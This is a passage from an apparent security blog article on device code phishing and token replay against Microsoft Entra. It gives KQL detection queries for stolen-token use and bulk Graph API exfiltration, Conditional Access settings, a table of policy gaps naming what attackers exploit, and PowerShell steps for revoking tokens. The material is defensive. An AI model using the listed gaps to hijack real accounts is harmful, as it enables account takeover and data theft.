13%, 16%)\"><span class=\"token plain\">// geo_distance_2points returns great-circle metres; a flat 111 km-per-degree</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// approximation overstates east-west distance away from the equator</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TimeDeltaMin = datetime_diff('minute', TimeGenerated, PrevTime),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DistanceKm = geo_distance_2points(PrevLon, PrevLat, Lon, Lat) / 1000.0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeDeltaMin &lt; TimeDeltaThresholdMinutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where DistanceKm &gt; MinDistanceKm</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          PreviousIP = PrevIP, CurrentIP = IPAddress, CurrentCountry = Country,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          TimeDeltaMin, DistanceKm, AppDisplayName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          UniqueTokenIdentifier</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"53-correlate-token-usage-to-graph-api-activity\">5.3 Correlate Token Usage to Graph API Activity<a 
href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#53-correlate-token-usage-to-graph-api-activity\" class=\"hash-link\" aria-label=\"Direct link to 5.3 Correlate Token Usage to Graph API Activity\" title=\"Direct link to 5.3 Correlate Token Usage to Graph API Activity\" translate=\"no\">​</a></h3>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Join SigninLogs to MicrosoftGraphActivityLogs to see what a token did</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Requires Graph Activity Logs to be configured in Log Analytics</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let SuspiciousTokens = SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UniqueTokenIdentifier, UserPrincipalName, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              SigninTime = TimeGenerated, SigninIP 
= IPAddress;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">MicrosoftGraphActivityLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=inner SuspiciousTokens on $left.UniqueTokenIdentifier == $right.UniqueTokenIdentifier</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, RequestUri, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          ResponseStatusCode, ClientIpAddress, SigninIP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated asc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"54-detect-prt-based-device-registration-abuse\">5.4 Detect PRT-Based Device Registration Abuse<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#54-detect-prt-based-device-registration-abuse\" class=\"hash-link\" aria-label=\"Direct link to 5.4 Detect PRT-Based Device Registration Abuse\" title=\"Direct link to 5.4 Detect PRT-Based Device Registration Abuse\" translate=\"no\">​</a></h3>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 
12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// High-fidelity: device registered immediately after device code auth</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Near-zero false positive rate in standard enterprise environments</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let lookback = 1h;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let DeviceCodeEvents = SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UserPrincipalName, DCTime = TimeGenerated, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              DCIPAddress = IPAddress, CorrelationId;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName in (\"Register device\", \"Add registered users to device\", </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                           \"Add member to role\", \"Add eligible member to role\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend ActorUPN = tostring(InitiatedBy.user.userPrincipalName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isnotempty(ActorUPN)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=inner DeviceCodeEvents on $left.ActorUPN == $right.UserPrincipalName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend TimeDelta = TimeGenerated - DCTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeDelta between (0min .. 
lookback)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project ActorUPN, OperationName, TimeGenerated, DCTime, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          TimeDelta, DCIPAddress,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          TargetResource = tostring(TargetResources[0].displayName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"55-hunt-for-refresh-token-abuse-patterns-bulk-graph-api-access\">5.5 Hunt for Refresh Token Abuse Patterns (Bulk Graph API Access)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#55-hunt-for-refresh-token-abuse-patterns-bulk-graph-api-access\" class=\"hash-link\" aria-label=\"Direct link to 5.5 Hunt for Refresh Token Abuse Patterns (Bulk Graph API Access)\" title=\"Direct link to 5.5 Hunt for Refresh Token Abuse Patterns (Bulk Graph API Access)\" translate=\"no\">​</a></h3>\n<p>Legitimate users don't query the Graph API in bulk at 3 AM:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect anomalous Graph API query volume from non-interactive sessions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
// Indicator">
plain\">// Indicator of automated data exfiltration using stolen tokens</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">MicrosoftGraphActivityLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where RequestMethod in (\"GET\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Hour = hourofday(TimeGenerated),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UPN = tostring(UserId)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Hour must be a group-by column: summarize drops every column it does not group or aggregate</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    RequestCount = count(),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UniqueEndpoints = dcount(RequestUri),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UniqueTokens = dcount(UniqueTokenIdentifier)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by UPN, Hour, bin(TimeGenerated, 1h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where RequestCount &gt; 500</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Hour between (0 .. 
6)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by RequestCount desc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-6--the-conditional-access-gaps-why-your-policy-probably-has-holes\">Part 6 - The Conditional Access Gaps: Why Your Policy Probably Has Holes<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-6--the-conditional-access-gaps-why-your-policy-probably-has-holes\" class=\"hash-link\" aria-label=\"Direct link to Part 6 - The Conditional Access Gaps: Why Your Policy Probably Has Holes\" title=\"Direct link to Part 6 - The Conditional Access Gaps: Why Your Policy Probably Has Holes\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"61-the-condition-that-blocks-device-code-phishing-and-why-its-not-deployed\">6.1 The Condition That Blocks Device Code Phishing (And Why It's Not Deployed)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#61-the-condition-that-blocks-device-code-phishing-and-why-its-not-deployed\" class=\"hash-link\" aria-label=\"Direct link to 6.1 The Condition That Blocks Device Code Phishing (And Why It's Not Deployed)\" title=\"Direct link to 6.1 The Condition That Blocks Device Code Phishing (And Why It's Not Deployed)\" translate=\"no\">​</a></h3>\n<p>Microsoft added the <strong>Authentication Flows</strong> Conditional Access condition specifically to address device code abuse:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 
98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Conditional Access Policy: \"Block Device Code Flow\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Assignments:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Users: All users</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Exclude: Break-glass accounts, service accounts with documented IoT needs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Target Resources:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Cloud apps: All cloud apps</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Conditions:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Authentication flows: Device code flow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Grant:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Block access</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<p><strong>Before enabling in enforcement mode, audit your environment:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"AuditLog.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$filter = \"authenticationProtocol eq 'deviceCode' and \" +</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          \"createdDateTime ge $(([datetime]::UtcNow.AddDays(-30)).ToString('o'))\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$signIns = Get-MgAuditLogSignIn -Filter $filter -All -Top 999</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$signIns | Select-Object -Property UserPrincipalName, AppDisplayName, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
<span class=\"token plain\">    IPAddress">
16%)\"><span class=\"token plain\">    IPAddress, CreatedDateTime | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Group-Object UserPrincipalName | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Sort-Object Count -Descending |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Name, Count, @{N='Apps';E={($_.Group.AppDisplayName | Sort-Object -Unique) -join ', '}} |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Export-Csv \"device_code_usage.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"62-the-six-most-common-conditional-access-gaps\">6.2 The Six Most Common Conditional Access Gaps<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#62-the-six-most-common-conditional-access-gaps\" class=\"hash-link\" aria-label=\"Direct link to 6.2 The Six Most Common Conditional Access Gaps\" title=\"Direct link to 6.2 The Six Most Common Conditional Access Gaps\" translate=\"no\">​</a></h3>\n<table><thead><tr><th>Gap</th><th>Why It Exists</th><th>What an Attacker Exploits</th></tr></thead><tbody><tr><td><strong>Device code flow not blocked</strong></td><td>Policy condition added by Microsoft in 2023; many tenants haven't revisited CA policies since</td><td>Full device code phishing as described above</td></tr><tr><td><strong>Non-interactive sign-ins not evaluated</strong></td><td>CA policies apply to interactive flows by default</td><td>Stolen refresh token replayed silently bypasses current-state CA evaluation</td></tr><tr><td><strong>Compliant device requirement not enforced for web apps</strong></td><td>Friction concerns</td><td>Token replayed in non-compliant 
browser bypasses device requirement</td></tr><tr><td><strong>Named Locations not maintained</strong></td><td>IT lists corporate office IPs but forgets VPN egress, trusted vendor ranges</td><td>All authenticated sessions from \"unknown\" locations generate low-signal alerts</td></tr><tr><td><strong>Legacy authentication not fully blocked</strong></td><td>Some legacy apps break when legacy auth is disabled</td><td>Brute-force via SMTP, IMAP, EWS; these protocols don't support MFA at all</td></tr><tr><td><strong>Admin role assignments not MFA + PIM protected</strong></td><td>Convenience: admins dislike step-up auth</td><td>Stolen token from standard user account can be used to escalate if admin roles aren't PIM-gated</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"63-continuous-access-evaluation--what-it-does-and-doesnt-protect\">6.3 Continuous Access Evaluation: What It Does and Doesn't Protect<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#63-continuous-access-evaluation--what-it-does-and-doesnt-protect\" class=\"hash-link\" aria-label=\"Direct link to 6.3 Continuous Access Evaluation: What It Does and Doesn't Protect\" title=\"Direct link to 6.3 Continuous Access Evaluation: What It Does and Doesn't Protect\" translate=\"no\">​</a></h3>\n<p>Continuous Access Evaluation (CAE) allows certain Microsoft services (Exchange Online, SharePoint, Teams, Graph) to re-evaluate access in near-real-time when risk signals change.</p>\n<p><strong>What CAE protects against:</strong></p>\n<ul>\n<li class=\"\">User account disabled → access revoked within minutes (not at next token expiry)</li>\n<li class=\"\">Password reset → refresh tokens invalidated quickly</li>\n<li class=\"\">High-risk event detected by Identity Protection → access blocked within minutes for CAE-capable clients</li>\n</ul>\n<p><strong>What CAE does NOT protect against:</strong></p>\n<ul>\n<li 
class=\"\">Attacker using the access token during its remaining lifetime (~60 min) before revocation propagates</li>\n<li class=\"\">Clients that don't support CAE (many third-party apps, older clients)</li>\n<li class=\"\">The 10–15 minute propagation delay between revocation action and enforcement even in CAE-capable clients</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"64-token-lifetime-configuration-what-you-can-actually-control\">6.4 Token Lifetime Configuration: What You Can Actually Control<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#64-token-lifetime-configuration-what-you-can-actually-control\" class=\"hash-link\" aria-label=\"Direct link to 6.4 Token Lifetime Configuration: What You Can Actually Control\" title=\"Direct link to 6.4 Token Lifetime Configuration: What You Can Actually Control\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Create a custom policy with shorter access token lifetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokenLifetimePolicy = @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Definition = @(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        '{\"TokenLifetimePolicy\":{\"Version\":1,\"AccessTokenLifetime\":\"00:30:00\"}}'</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    )</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DisplayName = \"ShortAccessTokenPolicy\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IsOrganizationDefault = $false</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">New-MgPolicyTokenLifetimePolicy -BodyParameter $tokenLifetimePolicy</span><br></span></code></pre></div></div>\n<p><strong>More impactful: Sign-in Frequency policy in Conditional Access</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">CA Policy: \"Require re-authentication for sensitive apps\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Assignments:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Users: All users</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Target: Azure portal, Exchange Online (admin operations), Graph Explorer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Session Controls:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Sign-in frequency: 4 hours (or 1 hour for highest-sensitivity)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Persistent browser session: Never persistent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-7--incident-response-when-token-theft-is-confirmed\">Part 7  Incident Response When Token Theft Is Confirmed<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-7--incident-response-when-token-theft-is-confirmed\" class=\"hash-link\" aria-label=\"Direct link to Part 7  Incident Response When Token Theft Is Confirmed\" title=\"Direct link to Part 7  Incident Response When Token Theft Is Confirmed\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"71-the-revocation-sequence\">7.1 The Revocation Sequence<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#71-the-revocation-sequence\" class=\"hash-link\" aria-label=\"Direct link to 7.1 The Revocation Sequence\" title=\"Direct link to 7.1 The Revocation Sequence\" translate=\"no\">​</a></h3>\n<p>If you have confirmed token theft, here is the exact remediation sequence. 
<strong>Order matters:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 1: Revoke ALL refresh tokens for the affected user</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># (steps 3, 5 and 6 below need additional Graph scopes: device, OAuth2 grant and authentication-method permissions)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"User.ReadWrite.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$userId = \"victim@company.com\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Invoke-MgRevokeUserSignInSession -UserId $userId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Verify revocation:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUser -UserId $userId -Property \"signInSessionsValidFromDateTime\" | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object signInSessionsValidFromDateTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 2: Disable the account to block non-CAE clients immediately</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># (-AccountEnabled is a switch parameter, so it must be negated with the colon syntax)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Update-MgUser -UserId $userId -AccountEnabled:$false</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Wait 60 minutes (one access-token lifetime), then re-enable:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Update-MgUser -UserId $userId -AccountEnabled:$true</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 3: Remove any malicious device registrations</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># registeredDevices come back as generic directoryObjects; the device fields live in AdditionalProperties</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUserRegisteredDevice -UserId $userId |</span><br></span><span class=\"token-line\" 